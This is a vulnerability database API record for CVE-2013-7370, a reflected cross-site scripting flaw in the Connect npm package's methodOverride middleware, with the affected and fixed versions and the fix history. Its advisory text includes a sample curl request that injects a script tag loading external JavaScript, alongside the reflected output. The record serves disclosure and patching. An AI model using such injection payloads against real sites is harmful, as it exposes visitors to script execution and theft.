GET

Vulnerability Instance

Lookup for vulnerabilities affecting packages.

GET /api/vulnerabilities/30484?format=api
HTTP 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "url": "http://public2.vulnerablecode.io/api/vulnerabilities/30484?format=api",
    "vulnerability_id": "VCID-nbgt-whdd-xyf9",
    "summary": "methodOverride Middleware Reflected Cross-Site Scripting\nConnect is a stack of middleware that is executed in order in each request.\n\nThe \"methodOverride\" middleware allows the http post to override the method of the request with the value of the \"_method\" post key or with the header \"x-http-method-override\".\n\nBecause the user post input was not checked, req.method could contain any kind of value. Because the req.method did not match any common method VERB, connect answered with a 404 page containing the \"Cannot [method] [url]\" content. The method was not properly encoded for output in the browser.\n\n\n###Example:\n```\n~ curl \"localhost:3000\" -d \"_method=<script src=http://nodesecurity.io/xss.js></script>\"\nCannot <SCRIPT SRC=HTTP://NODESECURITY.IO/XSS.JS></SCRIPT> /\n```\n\n###Credit:\n[Sergio Arcos](https://twitter.com/martes_trece)\n\n###History\n(2013-06-27) Bug reported:\nhttps://github.com/senchalabs/connect/issues/831\n\n(2013-06-27) First fix: escape req.method output\nhttps://github.com/senchalabs/connect/commit/277e5aad6a95d00f55571a9a0e11f2fa190d8135\n\n(2013-06-27) Second fix: whitelist\nhttps://github.com/senchalabs/connect/commit/126187c4e12162e231b87350740045e5bb06e93a",
    "aliases": [
        {
            "alias": "CVE-2013-7370"
        }
    ],
    "fixed_packages": [
        {
            "url": "http://public2.vulnerablecode.io/api/packages/6514?format=api",
            "purl": "pkg:npm/connect@2.8.1",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/connect@2.8.1"
        }
    ],
    "affected_packages": [
        {
            "url": "http://public2.vulnerablecode.io/api/packages/6513?format=api",
            "purl": "pkg:npm/connect@2.8.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-81fd-hg84-jkcm"
                },
                {
                    "vulnerability": "VCID-ff4q-8qw9-dfc1"
                },
                {
                    "vulnerability": "VCID-nbgt-whdd-xyf9"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/connect@2.8.0"
        }
    ],
    "references": [
        {
            "reference_url": "https://github.com/nodejs/security-wg/blob/main/vuln/npm/3.json",
            "reference_id": "3",
            "reference_type": "",
            "scores": [
                {
                    "value": "6.5",
                    "scoring_system": "cvssv3",
                    "scoring_elements": ""
                }
            ],
            "url": "https://github.com/nodejs/security-wg/blob/main/vuln/npm/3.json"
        }
    ],
    "weaknesses": [],
    "exploits": [],
    "severity_range_score": "6.5 - 6.5",
    "exploitability": null,
    "weighted_severity": null,
    "risk_score": null,
    "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nbgt-whdd-xyf9"
}